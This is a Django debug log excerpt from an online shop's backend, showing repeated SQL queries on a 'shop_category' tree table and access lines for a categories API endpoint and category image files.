SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:26:09,606 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:26:09,609 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:26:09,615 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:26:09,626 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:26:09,630 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:26:09,634 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:26:09,639 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:26:09,643 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:26:09,647 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:26:09,651 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:26:09,655 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:26:09,659 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:26:09,664 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:26:09,668 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:26:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 10:28:09,716 utils 4252 140031482124032 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:28:09,724 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:28:09,729 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:28:09,731 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:28:09,736 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:28:09,739 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:28:09,742 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:28:09,747 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:28:09,751 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:28:09,757 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:28:09,762 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:28:09,766 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:28:09,770 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:28:09,774 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:28:09,780 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:28:09,783 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:28:09,788 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:28:09,792 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:28:09,798 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:28:09,806 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:28:09,810 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:28:09,814 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:28:09,818 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:28:09,822 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:28:09,826 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:28:09,832 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:28:09,836 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:28:09,840 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:28:09,844 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:28:09,848 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:28:09,853 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:28:09,857 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:28:09,863 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:28:09,867 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:28:09,871 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:28:09,878 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:28:09,882 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:28:09,885 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:28:09,889 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:28:09,893 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:28:09,897 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:28:09,902 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:28:09,907 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:28:09,911 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:28:09,916 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:28:09,921 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:28:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:28:11] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 10:28:11] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 10:29:04,824 utils 4252 140031482124032 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:29:04,836 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:29:04,842 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:29:04,846 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:29:04,852 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:29:04,856 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 